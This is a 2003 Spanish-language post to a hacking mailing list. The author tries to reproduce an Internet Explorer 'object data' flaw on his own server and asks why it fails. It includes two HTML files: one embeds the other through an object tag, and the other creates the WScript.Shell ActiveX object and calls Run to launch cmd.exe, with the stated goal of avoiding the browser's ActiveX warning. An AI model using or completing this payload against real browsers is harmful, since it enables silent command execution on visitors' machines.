[HACK] Object data exploit
Pedro Jota Calvorota
calvorota at ya.com
Fri Sep 26 12:23:34 CEST 2003
Estoy intentando reproducir en mi propio sistema el error del object data
del IE que descubrió en agosto EEye.
Me monto mi apache y los dos archivos:
Archivo1:
<html>
...
<object data="localhost/exploit.html">
</object>
</html>
exploit.html:
<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
No me funciona, con IE, sé que soy vulnerable porque lo compruebo en una
página y porque no tengo instalado nada, el IE recien instalado del año
pasado, pero cuando cargo http://localhost/archivo1.html me sale un error
al ejecutar los comandos activeX algo así como "el objeto no soporta el
metodo". Y si llamo al exploit directo me sale un aviso de ejecucion de
active x potencialmente peligroso, lo que me chafa todo...
Se que estoy cerca, que casi todo esta bien porque primero al llamar al
exploit me avisa, pero si lo llamo indirectamete a traves de archivo1.html
no me avisa, que es el objetivo. el unico problema es el dichoso mensaje
de error de que el objeto no soporta el metodo.
¿Algo que este haciendo mal? ¿alguna idea?
More information about the hacking
mailing list